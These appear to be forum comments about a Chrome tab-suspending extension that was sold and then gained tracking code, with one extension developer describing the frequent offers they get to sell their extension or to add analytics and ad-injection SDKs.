Wow, this is why just recently my Macbook pro was registering high CPU usage even when all tabs were asleep using Great Suspender. For some reason, Chrome was registering high CPU usage, and I thought it was some Chrome bug.
A reddit link, from the blog post [0] has all the details for those who don't use chrome.
TLDR: A popular extension was quietly sold off to an unknown party that subsequently added tracking/analytics. Not specifically malware, but not trustworthy either.
On a daily basis, I will get requests to sell the extension. Once or twice a week, I will receive an offer to add "a couple lines of code" to my extension which are always generously described as "allowed in the Chrome Web Store" by little fly-by-night organizations that only even have a landing page half the time and usually have throwaway-looking gmail accounts. Out of curiosity, I've asked a few what their code does and they never fully describe it, but it either collects analytics to ship home (my extension runs on all sites, so it's appetizing to them!) or places paid results at the top of any search results, for which I can make "thousands of dollars a month based on the number of North American users I have".
Here is an example email I received yesterday. It's a good example of how they call it "an SDK" and looks like one of the more legit ones (they registered a domain to send email from, at least).
Finally, I am also hounded by teams at Microsoft and Apple, who want me to port the extension to their new plugin ecosystems so it can be featured/showcased. I worked with Apple on one similar thing for an extension and it caused such a huge jump in support and feature requests from users that I was overwhelmed, so I am not keen to do it again until I have more free time. They can't understand why I don't want to grow by tens of thousands of users a week, but I'm just one person and don't make money from it whatsoever.